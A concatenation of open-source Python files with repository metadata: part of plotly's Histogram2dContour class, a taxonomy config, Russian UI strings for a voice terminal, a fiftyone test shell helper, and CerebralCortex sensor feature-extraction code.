format/tree/v2.2.3#locale_format. We add two items to
d3's date formatter: "%h" for half of the year as a
decimal number as well as "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display *09~15~23.46*By default the values are
formatted using `xaxis.hoverformat`.
xsrc
Sets the source reference on Chart Studio Cloud for
`x`.
y
Sets the sample data to be binned on the y axis.
yaxis
Sets a reference between this trace's y coordinates and
a 2D cartesian y axis. If "y" (the default value), the
y coordinates refer to `layout.yaxis`. If "y2", the y
coordinates refer to `layout.yaxis2`, and so on.
ybingroup
Set a group of histogram traces which will have
compatible y-bin settings. Using `ybingroup`,
histogram2d and histogram2dcontour traces (on axes of
the same axis type) can have compatible y-bin settings.
Note that the same `ybingroup` value can be used to set
(1D) histogram `bingroup`
ybins
:class:`plotly.graph_objects.histogram2dcontour.YBins`
instance or dict with compatible properties
ycalendar
Sets the calendar system to use with `y` date data.
yhoverformat
Sets the hover text formatting rulefor `y` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
And for dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to
d3's date formatter: "%h" for half of the year as a
decimal number as well as "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display *09~15~23.46*By default the values are
formatted using `yaxis.hoverformat`.
ysrc
Sets the source reference on Chart Studio Cloud for
`y`.
z
Sets the aggregation data.
zauto
Determines whether or not the color domain is computed
with respect to the input data (here in `z`) or the
bounds set in `zmin` and `zmax` Defaults to `false`
when `zmin` and `zmax` are set by the user.
zhoverformat
Sets the hover text formatting rulefor `z` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see: https://github.com/d
3/d3-format/tree/v1.4.5#d3-format.By default the values
are formatted using generic number format.
zmax
Sets the upper bound of the color domain. Value should
have the same units as in `z` and if set, `zmin` must
be set as well.
zmid
Sets the mid-point of the color domain by scaling
`zmin` and/or `zmax` to be equidistant to this point.
Value should have the same units as in `z`. Has no
effect when `zauto` is `false`.
zmin
Sets the lower bound of the color domain. Value should
have the same units as in `z` and if set, `zmax` must
be set as well.
zsrc
Sets the source reference on Chart Studio Cloud for
`z`.
Returns
-------
Histogram2dContour
"""
super(Histogram2dContour, self).__init__("histogram2dcontour")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.Histogram2dContour
constructor must be a dict or
an instance of :class:`plotly.graph_objs.Histogram2dContour`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("autobinx", None)
_v = autobinx if autobinx is not None else _v
if _v is not None:
self["autobinx"] = _v
_v = arg.pop("autobiny", None)
_v = autobiny if autobiny is not None else _v
if _v is not None:
self["autobiny"] = _v
_v = arg.pop("autocolorscale", None)
_v = autocolorscale if autocolorscale is not None else _v
if _v is not None:
self["autocolorscale"] = _v
_v = arg.pop("autocontour", None)
_v = autocontour if autocontour is not None else _v
if _v is not None:
self["autocontour"] = _v
_v = arg.pop("bingroup", None)
_v = bingroup if bingroup is not None else _v
if _v is not None:
self["bingroup"] = _v
_v = arg.pop("coloraxis", None)
_v = coloraxis if coloraxis is not None else _v
if _v is not None:
self["coloraxis"] = _v
_v = arg.pop("colorbar", None)
_v = colorbar if colorbar is not None else _v
if _v is not None:
self["colorbar"] = _v
_v = arg.pop("colorscale", None)
_v = colorscale if colorscale is not None else _v
if _v is not None:
self["colorscale"] = _v
_v = arg.pop("contours", None)
_v = contours if contours is not None else _v
if _v is not None:
self["contours"] = _v
_v = arg.pop("customdata", None)
_v = customdata if customdata is not None else _v
if _v is not None:
self["customdata"] = _v
_v = arg.pop("customdatasrc", None)
_v = customdatasrc if customdatasrc is not None else _v
if _v is not None:
self["customdatasrc"] = _v
_v = arg.pop("histfunc", None)
_v = histfunc if histfunc is not None else _v
if _v is not None:
self["histfunc"] = _v
_v = arg.pop("histnorm", None)
_v = histnorm if histnorm is not None else _v
if _v is not None:
self["histnorm"] = _v
_v = arg.pop("hoverinfo", None)
_v = hoverinfo if hoverinfo is not None else _v
if _v is not None:
self["hoverinfo"] = _v
_v = arg.pop("hoverinfosrc", None)
_v = hoverinfosrc if hoverinfosrc is not None else _v
if _v is not None:
self["hoverinfosrc"] = _v
_v = arg.pop("hoverlabel", None)
_v = hoverlabel if hoverlabel is not None else _v
if _v is not None:
self["hoverlabel"] = _v
_v = arg.pop("hovertemplate", None)
_v = hovertemplate if hovertemplate is not None else _v
if _v is not None:
self["hovertemplate"] = _v
_v = arg.pop("hovertemplatesrc", None)
_v = hovertemplatesrc if hovertemplatesrc is not None else _v
if _v is not None:
self["hovertemplatesrc"] = _v
_v = arg.pop("ids", None)
_v = ids if ids is not None else _v
if _v is not None:
self["ids"] = _v
_v = arg.pop("idssrc", None)
_v = idssrc if idssrc is not None else _v
if _v is not None:
self["idssrc"] = _v
_v = arg.pop("legendgroup", None)
_v = legendgroup if legendgroup is not None else _v
if _v is not None:
self["legendgroup"] = _v
_v = arg.pop("legendgrouptitle", None)
_v = legendgrouptitle if legendgrouptitle is not None else _v
if _v is not None:
self["legendgrouptitle"] = _v
_v = arg.pop("legendrank", None)
_v = legendrank if legendrank is not None else _v
if _v is not None:
self["legendrank"] = _v
_v = arg.pop("line", None)
_v = line if line is not None else _v
if _v is not None:
self["line"] = _v
_v = arg.pop("marker", None)
_v = marker if marker is not None else _v
if _v is not None:
self["marker"] = _v
_v = arg.pop("meta", None)
_v = meta if meta is not None else _v
if _v is not None:
self["meta"] = _v
_v = arg.pop("metasrc", None)
_v = metasrc if metasrc is not None else _v
if _v is not None:
self["metasrc"] = _v
_v = arg.pop("name", None)
_v = name if name is not None else _v
if _v is not None:
self["name"] = _v
_v = arg.pop("nbinsx", None)
_v = nbinsx if nbinsx is not None else _v
if _v is not None:
self["nbinsx"] = _v
_v = arg.pop("nbinsy", None)
_v = nbinsy if nbinsy is not None else _v
if _v is not None:
self["nbinsy"] = _v
_v = arg.pop("ncontours", None)
_v = ncontours if ncontours is not None else _v
if _v is not None:
self["ncontours"] = _v
_v = arg.pop("opacity", None)
_v = opacity if opacity is not None else _v
if _v is not None:
self["opacity"] = _v
_v = arg.pop("reversescale", None)
_v = reversescale if reversescale is not None else _v
if _v is not None:
self["reversescale"] = _v
_v = arg.pop("showlegend", None)
_v = showlegend if showlegend is not None else _v
if _v is not None:
self["showlegend"] = _v
_v = arg.pop("showscale", None)
_v = showscale if showscale is not None else _v
if _v is not None:
self["showscale"] = _v
_v = arg.pop("stream", None)
_v = stream if stream is not None else _v
if _v is not None:
self["stream"] = _v
_v = arg.pop("textfont", None)
_v = textfont if textfont is not None else _v
if _v is not None:
self["textfont"] = _v
_v = arg.pop("texttemplate", None)
_v = texttemplate if texttemplate is not None else _v
if _v is not None:
self["texttemplate"] = _v
_v = arg.pop("uid", None)
_v = uid if uid is not None else _v
if _v is not None:
self["uid"] = _v
_v = arg.pop("uirevision", None)
_v = uirevision if uirevision is not None else _v
if _v is not None:
self["uirevision"] = _v
_v = arg.pop("visible", None)
_v = visible if visible is not None else _v
if _v is not None:
self["visible"] = _v
_v = arg.pop("x", None)
_v = x if x is not None else _v
if _v is not None:
self["x"] = _v
_v = arg.pop("xaxis", None)
_v = xaxis if xaxis is not None else _v
if _v is not None:
self["xaxis"] = _v
_v = arg.pop("xbingroup", None)
_v = xbingroup if xbingroup is not None else _v
if _v is not None:
self["xbingroup"] = _v
_v = arg.pop("xbins", None)
_v = xbins if xbins is not None else _v
if _v is not None:
self["xbins"] = _v
_v = arg.pop("xcalendar", None)
_v = xcalendar if xcalendar is not None else _v
if _v is not None:
self["xcalendar"] = _v
_v = arg.pop("xhoverformat", None)
_v = xhoverformat if xhoverformat is not None else _v
if _v is not None:
self["xhoverformat"] = _v
_v = arg.pop("xsrc", None)
_v = xsrc if xsrc is not None else _v
if _v is not None:
self["xsrc"] = _v
_v = arg.pop("y", None)
_v = y if y is not None else _v
if _v is not None:
self["y"] = _v
_v = arg.pop("yaxis", None)
_v = yaxis if yaxis is not None else _v
if _v is not None:
self["yaxis"] = _v
_v = arg.pop("ybingroup", None)
_v = ybingroup if ybingroup is not None else _v
if _v is not None:
self["ybingroup"] = _v
_v = arg.pop("ybins", None)
_v = ybins if ybins is not None else _v
if _v is not None:
self["ybins"] = _v
_v = arg.pop("ycalendar", None)
_v = ycalendar if ycalendar is not None else _v
if _v is not None:
self["ycalendar"] = _v
_v = arg.pop("yhoverformat", None)
_v = yhoverformat if yhoverformat is not None else _v
if _v is not None:
self["yhoverformat"] = _v
_v = arg.pop("ysrc", None)
_v = ysrc if ysrc is not None else _v
if _v is not None:
self["ysrc"] = _v
_v = arg.pop("z", None)
_v = z if z is not None else _v
if _v is not None:
self["z"] = _v
_v = arg.pop("zauto", None)
_v = zauto if zauto is not None else _v
if _v is not None:
self["zauto"] = _v
_v = arg.pop("zhoverformat", None)
_v = zhoverformat if zhoverformat is not None else _v
if _v is not None:
self["zhoverformat"] = _v
_v = arg.pop("zmax", None)
_v = zmax if zmax is not None else _v
if _v is not None:
self["zmax"] = _v
_v = arg.pop("zmid", None)
_v = zmid if zmid is not None else _v
if _v is not None:
self["zmid"] = _v
_v = arg.pop("zmin", None)
_v = zmin if zmin is not None else _v
if _v is not None:
self["zmin"] = _v
_v = arg.pop("zsrc", None)
_v = zsrc if zsrc is not None else _v
if _v is not None:
self["zsrc"] = _v
# Read-only literals
# ------------------
self._props["type"] = "histogram2dcontour"
arg.pop("type", None)
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| 37.934111 | 89 | 0.557871 | [
"MIT"
] | labaran1/plotly.py | packages/python/plotly/plotly/graph_objs/_histogram2dcontour.py | 120,327 | Python |
"""
Some settings for the config files
"""
# defaultdir = '/data/ncbi/taxonomy/current'
# defaultdir = '/home/edwa0468/ncbi/taxonomy'
defaultdir = '/raid60/usr/data/NCBI/taxonomy/current/'
def get_db_dir():
"""
Just return the default dir listed above
:return: the default location for the sqllite database
"""
return defaultdir
| 23.4 | 58 | 0.700855 | [
"MIT"
] | linsalrob/EdwardsLab | taxon/config.py | 351 | Python |
# Generated by scripts/localization_gen.py
def _config_pretty_models(_, count):
ot = 'о'
if count == 1:
et = 'ь'
ot = 'а'
elif count in [2, 3, 4]:
et = 'и'
else:
et = 'ей'
pretty = ['ноль', 'одна', 'две', 'три', 'четыре', 'пять', 'шесть']
count = pretty[count] if count < 7 else count
return 'Загружен{} {} модел{}'.format(ot, count, et)
LANG_CODE = {
'IETF': 'ru-RU',
'ISO': 'ru',
'aws': 'ru-RU',
}
YANDEX_EMOTION = {
'good': 'добрая',
'neutral': 'нейтральная',
'evil': 'злая',
}
YANDEX_SPEAKER = {
'jane': 'Джейн',
'oksana': 'Оксана',
'alyss': 'Алиса',
'omazh': 'Омар',
'zahar': 'Захар',
'ermil': 'Саня',
}
RHVOICE_SPEAKER = {
'anna': 'Аня',
'aleksandr': 'Александр',
'elena': 'Елена',
'irina': 'Ирина',
}
AWS_SPEAKER = {
'Tatyana': 'Татьяна',
'Maxim': 'Максим',
}
_LNG = {
# config.py
'Ошибка получения ключа для Yandex: {}': None,
'Ошибка сохранения {}: {}': None,
'Файл не найден (это нормально): {}': None,
'Ошибка загрузки {}: {}': None,
'Конфигурация сохранена за {}': None,
'Конфигурация сохранена!': None,
'Директория с моделями не найдена {}': None,
'Загружено {} моделей': _config_pretty_models,
'Файл настроек не найден по пути {}. Для первого запуска это нормально': None,
'Загружено {} опций за {}': None,
'Конфигурация загружена!': None,
'Ошибка инициализации языка {}: {}': None,
'Локализация {} загружена за {}': None,
'Конфигурация изменилась': None,
'Конфигурация не изменилась': None,
'Директория c tts кэшем не найдена {}': None,
'Удалены поврежденные файлы: {}': None,
'Размер tts кэша {}: {}': None,
'Ок.': None,
'Удаляем...': None,
'Удалено: {}': None,
'Удалено {} файлов. Новый размер TTS кэша {}': None,
'Директория {} не найдена. Создаю...': None,
# config.py terminal.py player.py
'Файл {} не найден.': None,
# config.py
'Это надо исправить!': None,
'Терминал еще не настроен, мой IP адрес: {}': None,
# listener.py stts.py
'Распознано за {}': None,
# listener.py
'Записано за {}': None,
'{} слушает': None,
'Голосовая активация по {}{}': None,
# loader.py
'Приветствую. Голосовой терминал настраивается, три... два... один...': None,
'Голосовой терминал завершает свою работу.': None,
# modules_manager.py
'Обычный': None,
# modules_manager.py modules.py
'Отладка': None,
# modules_manager.py
'Любой': None,
'восстановлен': None,
'удален': None,
'Отключенные модули: {}': None,
'Неактивные модули: {}': None,
'Активные модули: {}': None,
'Обнаружены конфликты в режиме {}: {}': None,
# modules_manager.py modules.py
'Вы ничего не сказали?': None,
# modules_manager.py
'Захвачено {}': None,
# terminal.py
'Пустая очередь? Impossible!': None,
'Получено {}:{}, lvl={} опоздание {} секунд.': None,
'{} Игнорирую.': None,
'Не верный вызов, WTF? {}:{}, lvl={}': None,
'Недопустимое значение: {}': None,
'Не настроено': None,
'Громкость {} процентов': None,
'Громкость музыки {} процентов': None,
'{} не поддерживает запись образцов.': None,
'первого': None,
'второго': None,
'третьего': None,
'Ошибка записи - недопустимый параметр': None,
'Запись {} образца на 5 секунд начнется после звукового сигнала': None,
'Запись {} образца завершена. Вы можете прослушать свою запись.': None,
'Ошибка сохранения образца {}: {}': None,
'Ошибка воспроизведения - файл {} не найден': None,
'{} не поддерживает тренировку моделей.': None,
' и еще {}': None,
'Ошибка компиляции - файлы {} не найдены в {}.': None,
'Ошибка компиляции - файлы не найдены.': None,
'Ошибка удаление модели номер {}': None,
'Модель номер {} удалена': None,
'Модель номер {} не найдена': None,
'Полный консенсус по модели {} не достигнут [{}/{}]. Советую пересоздать модель.': None,
'Полный консенсус по модели {} не достигнут. Компиляция отменена.': None,
'Компилирую {}': None,
'Ошибка компиляции модели {}: {}': None,
'Ошибка компиляции модели номер {}': None,
'Модель{} скомпилирована успешно за {}: {}': None,
'Модель{} номер {} скомпилирована успешно за {}': None,
# logger.py
'Логгирование в {} невозможно - отсутствуют права на запись. Исправьте это': None,
# modules.py
'блокировка': None,
'Блокировка снята': None,
'Блокировка включена': None,
'Блокировка': None,
'Включение/выключение блокировки терминала': None,
'выход': None,
'Внимание! Выход из режима разработчика': None,
'режим разработчика': None,
"Внимание! Включён режим разработчика. Для возврата в обычный режим скажите 'выход'": None,
'Режим настройки и отладки': None,
'Модуль {} не найден': None,
'Модуль {} системный, его нельзя настраивать': None,
'активировать': None,
'деактивировать': None,
'активировать везде': None,
'удалить': None,
'восстановить': None,
'Модуль {} удален. Вначале его нужно восстановить': None,
'Модуль {} уже в режиме {}': None,
'Теперь модуль {} доступен в режиме {}': None,
'Модуль {} и так {}': None,
'Модуль {} {}': None,
'Это невозможно, откуда тут {}': None,
'Менеджер': None,
'Управление модулями': None,
'Скажи': None,
'Произнесение фразы': None,
'Ничего': None,
'минус': None,
'плюс': None,
'до': None,
'от': None,
'Это слишком много для меня - считать {} чисел.': None,
'Я всё сосчитала': None,
'считалка': None,
'Считалка до числа. Или от числа до числа. Считалка произносит не больше 20 чисел за раз': None,
'сосчитай': None,
'считай': None,
'посчитай': None,
'Ошибка': None,
'Не поддерживается для {}': None,
' Я очень {}.': None,
'Меня зовут {}.{}': None,
'Кто я': None,
'Получение информации о настройках голосового генератора (только для Яндекса и RHVoice)': None,
'кто ты': None,
'какая ты': None,
'Теперь я': None,
'Изменение характера или голоса голосового генератора (только для Яндекса и RHVoice)': None,
'теперь ты': None,
'стань': None,
'Я уже {}.': None,
'Теперь меня зовут {}, а еще я {}.': None,
'без характера': None,
'Теперь я очень {} {}.': None,
'о': None,
'про': None,
'в': None,
'Ищу в вики о {}': None,
'Уточните свой вопрос: {}': None,
'Я ничего не знаю о {}.': None,
'Вики': None,
'Поиск в Википедии': None,
'расскажи': None,
'что ты знаешь': None,
'кто такой': None,
'что такое': None,
'зачем нужен': None,
'для чего': None,
'любую фразу': None,
'. Модуль удален': None,
'Модуль {} доступен в режиме {}. Для активации скажите {}. Модуль предоставляет {} {}': None,
'Скажите {}. Это активирует {}. Модуль предоставляет {}': None,
'Всего доступно {} модулей. Вот они:': None,
'Всего {} модулей удалены, это: {}': None,
'Работа модуля помощь завершена.': None,
'Помощь': None,
'Справку по модулям (вот эту)': None,
'помощь': None,
'справка': None,
'help': None,
'хелп': None,
'Come Along With Me.': None,
'Выход': None,
'Завершение работы голосового терминала': None,
'завершение работы': None,
'завершить работу': None,
'завершить': None,
'Терминал перезагрузится через 5... 4... 3... 2... 1...': None,
'Перезагрузка': None,
'Перезапуск голосового терминала': None,
'Ребут': None,
'Рестарт': None,
'reboot': None,
'громкость': None,
'Изменение громкости': None,
'громкость музыки': None,
'IP сервера не задан.': None,
'IP сервера не задан, исправьте это! Мой IP адрес: {}': None,
'Невозможно доставить - маршрут не найден': None,
'Скажи ': None,
'Мажордом': None,
'Отправку команд на сервер': None,
'Соответствие фразе не найдено: {}': None,
'Терминатор': None,
'Информацию что соответствие фразе не найдено': None,
# stts.py
'Неизвестный провайдер: {}': None,
'{} за {}{}: {}': None,
'{}найдено в кэше': None,
'{}сгенерированно {}': None,
"Ошибка синтеза речи от {}, ключ '{}'. ({})": None,
'Микрофоны не найдены': None,
'Доступны {}, от 0 до {}.': None,
'Не верный индекс микрофона {}. {}': None,
'Голос записан за {}': None,
'Во время записи произошел сбой, это нужно исправить': None,
'Ошибка распознавания - неизвестный провайдер {}': None,
'Для распознавания используем {}': None,
'Произошла ошибка распознавания': None,
"Ошибка распознавания речи от {}, ключ '{}'. ({})": None,
'Распознано: {}. Консенсус: {}': None,
'Привет': None,
'Слушаю': None,
'На связи': None,
'Привет-Привет': None,
'Я ничего не услышала': None,
'Вы ничего не сказали': None,
'Ничего не слышно': None,
'Не поняла': None,
'Ничего не слышно, повторите ваш запрос': None,
# notifier.py
'Запрос был успешен: {}': None,
'Ошибка коммуникации с сервером: {}': None,
# player.py
'Неизвестный тип файла: {}': None,
'Играю {} ...': None,
'Стримлю {} ...': None,
# updater.py
'Выполнен откат.': None,
'Во время обновления возникла ошибка': None,
'Вы используете последнюю версию терминала.': None,
'Файлы обновлены: {}': None,
'Терминал успешно обновлен.': None,
'Требуется перезапуск.': None,
'Во время обработки обновления или установки зависимостей возникла ошибка': None,
'Выполняется откат обновления.': None,
'Во время отката обновления возникла ошибка: {}': None,
'Откат невозможен.': None,
'Откат обновления выполнен успешно.': None,
'Зависимости {} {}обновлены: {}': None,
'не ': None,
# server.py
'Ошибка запуска сервера{}.': None,
' - адрес уже используется': None,
'Ошибка запуска сервера на {}:{}: {}': None,
# backup.py
'Запущено восстановление из бэкапа {}...': None,
'Восстановление не возможно: {}': None,
'Восстановление не удалось: {}': None,
'бэкап не создан': None,
'Восстановление завершено за {}, восстановлено {} файлов': None,
'Демон еще работает': None,
'Некорректное имя файла: {}': None,
'Файл не найден: {}': None,
'Архив поврежден: {}: {}': None,
'Ошибка создания бэкапа': None,
'Файл {} уже существует, отмена.': None,
'файл уже существует': None,
'Бэкап {} создан за {} [size: {}, compressed: {}, rate: {}%]': None,
'Бэкап успешно создан': None,
'Ошибка удаления старого бэкапа {}: {}': None,
'Удален старый бэкап {}': None,
# lib/base_music_controller.py
'Ошибка подключения к {}-серверу': None,
}
| 33.820189 | 100 | 0.598265 | [
"Apache-2.0",
"MIT"
] | Aculeasis/mdmTerminal2 | src/languages/ru.py | 15,427 | Python |
"""
A script that simulates a Python shell and accepts arbitrary commands to
execute. For use by service tests.
| Copyright 2017-2022, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import os
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.service.ipc import IPCServer
env = {}
def handle_message(message):
try:
code = compile(message, "", "eval")
except SyntaxError:
code = compile(message, "", "exec")
return eval(code, env)
IPCServer(handle_message).serve_forever()
| 19.62963 | 72 | 0.688679 | [
"Apache-2.0"
] | 3Demonica/fiftyone | tests/utils/interactive_python.py | 530 | Python |
from typing import List
import numpy as np
import pandas as pd
from pyspark.sql.functions import pandas_udf, PandasUDFType
from pyspark.sql.types import *
# from pyspark.sql.functions import pandas_udf,PandasUDFType
from pyspark.sql.types import StructType
from cerebralcortex.core.datatypes import DataStream
from cerebralcortex.core.metadata_manager.stream.metadata import Metadata
def compute_corr_mse_accel_gyro(self, exclude_col_names: list = [],
accel_column_names: list = ['accelerometer_x', 'accelerometer_y', 'accelerometer_z'],
gyro_column_names: list = ['gyroscope_y', 'gyroscope_x', 'gyroscope_z'],
windowDuration: int = None,
slideDuration: int = None,
groupByColumnName: List[str] = [], startTime=None):
"""
Compute correlation and mean standard error of accel and gyro sensors
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
accel_column_names list(str): name of accel data column
gyro_column_names list(str): name of gyro data column
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
"""
feature_names = ["ax_ay_corr", 'ax_az_corr', 'ay_az_corr', 'gx_gy_corr', 'gx_gz_corr',
'gy_gz_corr', 'ax_ay_mse', 'ax_az_mse', 'ay_az_mse', 'gx_gy_mse', 'gx_gz_mse', 'gy_gz_mse']
exclude_col_names.extend(["timestamp", "localtime", "user", "version"])
data = self._data.drop(*exclude_col_names)
basic_schema = StructType([
StructField("timestamp", TimestampType()),
StructField("localtime", TimestampType()),
StructField("user", StringType()),
StructField("version", IntegerType()),
StructField("start_time", TimestampType()),
StructField("end_time", TimestampType())
])
features_list = []
for fn in feature_names:
features_list.append(StructField(fn, FloatType(), True))
features_schema = StructType(basic_schema.fields + features_list)
@pandas_udf(features_schema, PandasUDFType.GROUPED_MAP)
def get_corr_mse_features_udf(df):
timestamp = df['timestamp'].iloc[0]
localtime = df['localtime'].iloc[0]
user = df['user'].iloc[0]
version = df['version'].iloc[0]
start_time = timestamp
end_time = df['timestamp'].iloc[-1]
ax_ay_corr = df[accel_column_names[0]].corr(df[accel_column_names[1]])
ax_az_corr = df[accel_column_names[0]].corr(df[accel_column_names[2]])
ay_az_corr = df[accel_column_names[1]].corr(df[accel_column_names[2]])
gx_gy_corr = df[gyro_column_names[0]].corr(df[gyro_column_names[1]])
gx_gz_corr = df[gyro_column_names[0]].corr(df[gyro_column_names[2]])
gy_gz_corr = df[gyro_column_names[1]].corr(df[gyro_column_names[2]])
ax_ay_mse = ((df[accel_column_names[0]] - df[accel_column_names[1]]) ** 2).mean()
ax_az_mse = ((df[accel_column_names[0]] - df[accel_column_names[2]]) ** 2).mean()
ay_az_mse = ((df[accel_column_names[1]] - df[accel_column_names[2]]) ** 2).mean()
gx_gy_mse = ((df[accel_column_names[0]] - df[accel_column_names[1]]) ** 2).mean()
gx_gz_mse = ((df[accel_column_names[0]] - df[accel_column_names[2]]) ** 2).mean()
gy_gz_mse = ((df[accel_column_names[1]] - df[accel_column_names[2]]) ** 2).mean()
basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time, ax_ay_corr,
ax_az_corr, ay_az_corr, gx_gy_corr, gx_gz_corr, gy_gz_corr, ax_ay_mse, ax_az_mse,
ay_az_mse, gx_gy_mse, gx_gz_mse, gy_gz_mse]],
columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time',
"ax_ay_corr", 'ax_az_corr', 'ay_az_corr', 'gx_gy_corr', 'gx_gz_corr',
'gy_gz_corr', 'ax_ay_mse', 'ax_az_mse', 'ay_az_mse', 'gx_gy_mse',
'gx_gz_mse', 'gy_gz_mse'])
return basic_df
data = self.compute(get_corr_mse_features_udf, windowDuration=windowDuration, slideDuration=slideDuration,
groupByColumnName=groupByColumnName, startTime=startTime)
return DataStream(data=data._data, metadata=Metadata())
def compute_fourier_features(self, exclude_col_names: list = [],
feature_names=["fft_centroid", 'fft_spread', 'spectral_entropy',
'spectral_entropy_old', 'fft_flux',
'spectral_falloff'], windowDuration: int = None,
slideDuration: int = None,
groupByColumnName: List[str] = [], startTime=None):
"""
Transforms data from time domain to frequency domain.
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
feature_names list(str): names of the features. Supported features are fft_centroid, fft_spread, spectral_entropy, spectral_entropy_old, fft_flux, spectral_falloff
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
"""
eps = 0.00000001
exclude_col_names.extend(["timestamp", "localtime", "user", "version"])
data = self._data.drop(*exclude_col_names)
df_column_names = data.columns
basic_schema = StructType([
StructField("timestamp", TimestampType()),
StructField("localtime", TimestampType()),
StructField("user", StringType()),
StructField("version", IntegerType()),
StructField("start_time", TimestampType()),
StructField("end_time", TimestampType())
])
features_list = []
for cn in df_column_names:
for sf in feature_names:
features_list.append(StructField(cn + "_" + sf, FloatType(), True))
features_schema = StructType(basic_schema.fields + features_list)
def stSpectralCentroidAndSpread(X, fs):
"""Computes spectral centroid of frame (given abs(FFT))"""
ind = (np.arange(1, len(X) + 1)) * (fs / (2.0 * len(X)))
Xt = X.copy()
Xt = Xt / Xt.max()
NUM = np.sum(ind * Xt)
DEN = np.sum(Xt) + eps
# Centroid:
C = (NUM / DEN)
# Spread:
S = np.sqrt(np.sum(((ind - C) ** 2) * Xt) / DEN)
# Normalize:
C = C / (fs / 2.0)
S = S / (fs / 2.0)
return (C, S)
def stSpectralFlux(X, Xprev):
"""
Computes the spectral flux feature of the current frame
ARGUMENTS:
X: the abs(fft) of the current frame
Xpre: the abs(fft) of the previous frame
"""
# compute the spectral flux as the sum of square distances:
sumX = np.sum(X + eps)
sumPrevX = np.sum(Xprev + eps)
F = np.sum((X / sumX - Xprev / sumPrevX) ** 2)
return F
def stSpectralRollOff(X, c, fs):
"""Computes spectral roll-off"""
totalEnergy = np.sum(X ** 2)
fftLength = len(X)
Thres = c * totalEnergy
# Ffind the spectral rolloff as the frequency position where the respective spectral energy is equal to c*totalEnergy
CumSum = np.cumsum(X ** 2) + eps
[a, ] = np.nonzero(CumSum > Thres)
if len(a) > 0:
mC = np.float64(a[0]) / (float(fftLength))
else:
mC = 0.0
return (mC)
def stSpectralEntropy(X, numOfShortBlocks=10):
"""Computes the spectral entropy"""
L = len(X) # number of frame samples
Eol = np.sum(X ** 2) # total spectral energy
subWinLength = int(np.floor(L / numOfShortBlocks)) # length of sub-frame
if L != subWinLength * numOfShortBlocks:
X = X[0:subWinLength * numOfShortBlocks]
subWindows = X.reshape(subWinLength, numOfShortBlocks,
order='F').copy() # define sub-frames (using matrix reshape)
s = np.sum(subWindows ** 2, axis=0) / (Eol + eps) # compute spectral sub-energies
En = -np.sum(s * np.log2(s + eps)) # compute spectral entropy
return En
def spectral_entropy(data, sampling_freq, bands=None):
psd = np.abs(np.fft.rfft(data)) ** 2
psd /= np.sum(psd) # psd as a pdf (normalised to one)
if bands is None:
power_per_band = psd[psd > 0]
else:
freqs = np.fft.rfftfreq(data.size, 1 / float(sampling_freq))
bands = np.asarray(bands)
freq_limits_low = np.concatenate([[0.0], bands])
freq_limits_up = np.concatenate([bands, [np.Inf]])
power_per_band = [np.sum(psd[np.bitwise_and(freqs >= low, freqs < up)])
for low, up in zip(freq_limits_low, freq_limits_up)]
power_per_band = power_per_band[power_per_band > 0]
return -np.sum(power_per_band * np.log2(power_per_band))
def fourier_features_pandas_udf(data, frequency: float = 16.0):
Fs = frequency # the sampling freq (in Hz)
results = []
# fourier transforms!
# data_fft = abs(np.fft.rfft(data))
X = abs(np.fft.fft(data))
nFFT = int(len(X) / 2) + 1
X = X[0:nFFT] # normalize fft
X = X / len(X)
if "fft_centroid" or "fft_spread" in feature_names:
C, S = stSpectralCentroidAndSpread(X, Fs) # spectral centroid and spread
if "fft_centroid" in feature_names:
results.append(C)
if "fft_spread" in feature_names:
results.append(S)
if "spectral_entropy" in feature_names:
se = stSpectralEntropy(X) # spectral entropy
results.append(se)
if "spectral_entropy_old" in feature_names:
se_old = spectral_entropy(X, frequency) # spectral flux
results.append(se_old)
if "fft_flux" in feature_names:
flx = stSpectralFlux(X, X.copy()) # spectral flux
results.append(flx)
if "spectral_folloff" in feature_names:
roff = stSpectralRollOff(X, 0.90, frequency) # spectral rolloff
results.append(roff)
return pd.Series(results)
@pandas_udf(features_schema, PandasUDFType.GROUPED_MAP)
def get_fft_features(df):
timestamp = df['timestamp'].iloc[0]
localtime = df['localtime'].iloc[0]
user = df['user'].iloc[0]
version = df['version'].iloc[0]
start_time = timestamp
end_time = df['timestamp'].iloc[-1]
df.drop(exclude_col_names, axis=1, inplace=True)
df_ff = df.apply(fourier_features_pandas_udf)
df3 = df_ff.T
pd.set_option('display.max_colwidth', -1)
# split column into multiple columns
